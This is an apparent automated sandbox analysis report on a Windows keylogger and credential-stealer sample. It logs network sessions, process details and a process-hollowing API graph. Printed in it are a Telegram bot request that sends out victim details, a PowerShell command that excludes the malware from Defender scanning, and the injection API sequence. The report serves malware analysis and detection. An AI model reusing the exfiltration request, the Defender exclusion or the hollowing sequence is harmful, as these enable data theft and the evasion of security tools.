                                              2024-09-25 19:54:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.749714188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-25 19:54:26 UTC678INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:26 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46125
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gk3Fx8tbtNPEyPvk0XQ0Kj8BKREr3WvCKyl%2BEaabXSHsUzwBBv0e7Yoh7l5GyRx0%2B3esE4GdRx0ze%2FgKhiwMuKPznekiTQxM9Ua0uGKobsI8zrau8mtNiNG6CQCv6FovW4FLSu%2Fp"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d90ec4de742e6-EWR
                                              2024-09-25 19:54:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.749716188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:27 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-25 19:54:28 UTC682INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:28 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46127
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdJPGq1dKOojjXFyk7F3ec2%2B%2FzNYgBAJDJutPdpUQL2ONHNw7HQQCBotRHMsRH7CWfGKxPUCn%2BuExctPh3Y5QaO%2BjHvtJQXtpc1uQeCAp4S%2BvO9GFNiBkBJ3MwLT4%2BcVloZ45FVO"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d90f53d4643e9-EWR
                                              2024-09-25 19:54:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.749718188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:29 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-25 19:54:29 UTC678INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:29 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46128
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vm%2BTNL9j1dZX1gI6gWqJMup3fdXk47b6xQ4v8uJw%2BVxIbYRnBHF1RQdXoXbwJabEUGR7QlS6RaNP%2BcwqagZFLWYp4kBWiDWmKAxm1wYMXQ8XGS6bUMra2%2Bv3KIYRZvzvrqYu14xI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d90fd0963429d-EWR
                                              2024-09-25 19:54:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.749720188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-25 19:54:30 UTC682INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:30 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46129
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIbY2UjQcVHMApjGVQEqX9jTJAezc0dVSNXF3PLn67QKhyzcLhbtV%2F%2FNo%2Bik%2FeyU9TXUdpijFmpV%2FQ%2BUtSzLAa59MLNXYddpZ03LTAlUo63KslwKEDWhCL1DnUWuvGG2QWWWtEtG"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d9104dc8342de-EWR
                                              2024-09-25 19:54:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.749722188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:31 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-25 19:54:31 UTC678INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:31 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46130
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSTq6btC95XYhaQ6fo2vIai74WCB8sdQVST91%2FsQv0m3SSXdrH0VHsJBJ8KINSPdchDKmh%2BWBkRuLizU3xctQUAgg%2BVh4buAGgz7zxTHKYqquH1PMHjD6gJ8VI5%2FIuJd8ZutswG5"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d910c996d1986-EWR
                                              2024-09-25 19:54:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.749723149.154.167.2204437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:32 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-09-25 19:54:32 UTC344INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Wed, 25 Sep 2024 19:54:32 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-25 19:54:32 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:15:54:16
                                              Start date:25/09/2024
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
                                              Imagebase:0x130000
                                              File size:694'272 bytes
                                              MD5 hash:48977F1B641A9A3D88329AC470152381
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:15:54:17
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
                                              Imagebase:0x4a0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:15:54:17
                                              Start date:25/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:15:54:17
                                              Start date:25/09/2024
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
                                              Imagebase:0xd50000
                                              File size:694'272 bytes
                                              MD5 hash:48977F1B641A9A3D88329AC470152381
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:6
                                              Start time:15:54:20
                                              Start date:25/09/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff7fb730000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:15.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:138
                                                Total number of Limit Nodes:8
                                                execution_graph 4289 6ca3aa8 4290 6ca3c68 4289->4290 4292 6ca3ace 4289->4292 4291 6ca3c33 4292->4291 4295 6ca412b 4292->4295 4298 6ca4130 PostMessageW 4292->4298 4296 6ca4130 PostMessageW 4295->4296 4297 6ca419c 4296->4297 4297->4292 4299 6ca419c 4298->4299 4299->4292 4300 6ca1bde 4301 6ca1be4 4300->4301 4306 6ca28c0 4301->4306 4321 6ca292e 4301->4321 4337 6ca28d0 4301->4337 4302 6ca1bf5 4307 6ca28ea 4306->4307 4352 6ca3107 4307->4352 4357 6ca3036 4307->4357 4362 6ca3141 4307->4362 4366 6ca2db0 4307->4366 4371 6ca2f03 4307->4371 4375 6ca2fc2 4307->4375 4379 6ca326c 4307->4379 4384 6ca2cbf 4307->4384 4390 6ca3169 4307->4390 4395 6ca2e48 4307->4395 4400 6ca35cb 4307->4400 4405 6ca2caa 4307->4405 4308 6ca290e 4308->4302 4322 6ca28bc 4321->4322 4324 6ca2931 4321->4324 4325 6ca2caa 2 API calls 4322->4325 4326 6ca35cb 2 API calls 4322->4326 4327 6ca2e48 2 API calls 4322->4327 4328 6ca3169 2 API calls 4322->4328 4329 6ca2cbf 2 API calls 4322->4329 4330 6ca326c 2 API calls 4322->4330 4331 6ca2fc2 2 API calls 4322->4331 4332 6ca2f03 2 API calls 4322->4332 4333 6ca2db0 2 API calls 4322->4333 4334 6ca3141 2 API calls 4322->4334 4335 6ca3036 2 API calls 4322->4335 4336 6ca3107 2 API calls 4322->4336 4323 6ca290e 4323->4302 4324->4302 4325->4323 4326->4323 4327->4323 4328->4323 4329->4323 4330->4323 4331->4323 4332->4323 4333->4323 4334->4323 4335->4323 4336->4323 4338 6ca28ea 4337->4338 4340 6ca2caa 2 API calls 4338->4340 4341 6ca35cb 2 API calls 4338->4341 4342 6ca2e48 2 API calls 4338->4342 4343 6ca3169 2 API calls 4338->4343 4344 6ca2cbf 2 API calls 4338->4344 4345 6ca326c 2 API calls 4338->4345 4346 6ca2fc2 2 API calls 4338->4346 4347 6ca2f03 2 API calls 4338->4347 4348 6ca2db0 2 API calls 4338->4348 4349 6ca3141 2 API calls 4338->4349 4350 6ca3036 2 API calls 4338->4350 4351 6ca3107 2 API calls 4338->4351 4339 6ca290e 4339->4302 4340->4339 4341->4339 4342->4339 4343->4339 4344->4339 4345->4339 4346->4339 4347->4339 4348->4339 4349->4339 4350->4339 4351->4339 4410 6ca394f 4352->4410 4415 6ca3960 4352->4415 4353 6ca30f3 4353->4352 4354 6ca2da9 4353->4354 4358 6ca303a 4357->4358 4359 6ca34f6 4358->4359 4428 6ca12b8 4358->4428 4432 6ca12b0 4358->4432 4363 6ca3153 4362->4363 4436 6ca11f8 4363->4436 4440 6ca11f3 4363->4440 4367 6ca2dbd 4366->4367 4369 6ca12b8 WriteProcessMemory 4367->4369 4370 6ca12b0 WriteProcessMemory 4367->4370 4368 6ca3093 4369->4368 4370->4368 4373 6ca12b8 WriteProcessMemory 4371->4373 4374 6ca12b0 WriteProcessMemory 4371->4374 4372 6ca2f31 4372->4308 4373->4372 4374->4372 4377 6ca1118 Wow64SetThreadContext 4375->4377 4378 6ca1120 Wow64SetThreadContext 4375->4378 4376 6ca2fe1 4376->4308 4377->4376 4378->4376 4380 6ca3272 4379->4380 4444 6ca1068 4380->4444 4448 6ca1070 4380->4448 4381 6ca2d7a 4381->4308 4385 6ca2caa 4384->4385 4387 6ca3808 4385->4387 4452 6ca1540 4385->4452 4456 6ca1537 4385->4456 4386 6ca2d4f 4386->4308 4387->4308 4391 6ca3183 4390->4391 4392 6ca2d7a 4391->4392 4393 6ca1068 ResumeThread 4391->4393 4394 6ca1070 ResumeThread 4391->4394 4392->4308 4393->4392 4394->4392 4397 6ca303a 4395->4397 4396 6ca34f6 4397->4396 4398 6ca12b8 WriteProcessMemory 4397->4398 4399 6ca12b0 WriteProcessMemory 4397->4399 4398->4397 4399->4397 4401 6ca35d1 4400->4401 4461 6ca13a8 4401->4461 4465 6ca13a3 4401->4465 4402 6ca3483 4402->4308 4406 6ca2cb4 4405->4406 4408 6ca1540 CreateProcessA 4406->4408 4409 6ca1537 CreateProcessA 4406->4409 4407 6ca2d4f 4407->4308 4408->4407 4409->4407 4411 6ca3960 4410->4411 4420 6ca1118 4411->4420 4424 6ca1120 4411->4424 4412 6ca398b 4412->4353 4416 6ca3975 4415->4416 4418 6ca1118 Wow64SetThreadContext 4416->4418 4419 6ca1120 Wow64SetThreadContext 4416->4419 4417 6ca398b 4417->4353 4418->4417 4419->4417 4421 6ca1120 Wow64SetThreadContext 4420->4421 4423 6ca11ad 4421->4423 4423->4412 4425 6ca1165 Wow64SetThreadContext 4424->4425 4427 6ca11ad 4425->4427 4427->4412 4429 6ca1300 WriteProcessMemory 4428->4429 4431 6ca1357 4429->4431 4431->4358 4433 6ca12b8 WriteProcessMemory 4432->4433 4435 6ca1357 4433->4435 4435->4358 4437 6ca1238 VirtualAllocEx 4436->4437 4439 6ca1275 4437->4439 4439->4363 4441 6ca11f8 VirtualAllocEx 4440->4441 4443 6ca1275 4441->4443 4443->4363 4445 6ca1070 ResumeThread 4444->4445 4447 6ca10e1 4445->4447 4447->4381 4449 6ca10b0 ResumeThread 4448->4449 4451 6ca10e1 4449->4451 4451->4381 4453 6ca15c9 4452->4453 4453->4453 4454 6ca172e CreateProcessA 4453->4454 4455 6ca178b 4454->4455 4455->4455 4457 6ca14df 4456->4457 4458 6ca153e CreateProcessA 4456->4458 4457->4386 4460 6ca178b 4458->4460 4462 6ca13f3 ReadProcessMemory 4461->4462 4464 6ca1437 4462->4464 4464->4402 4466 6ca13a8 ReadProcessMemory 4465->4466 4468 6ca1437 4466->4468 4468->4402

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
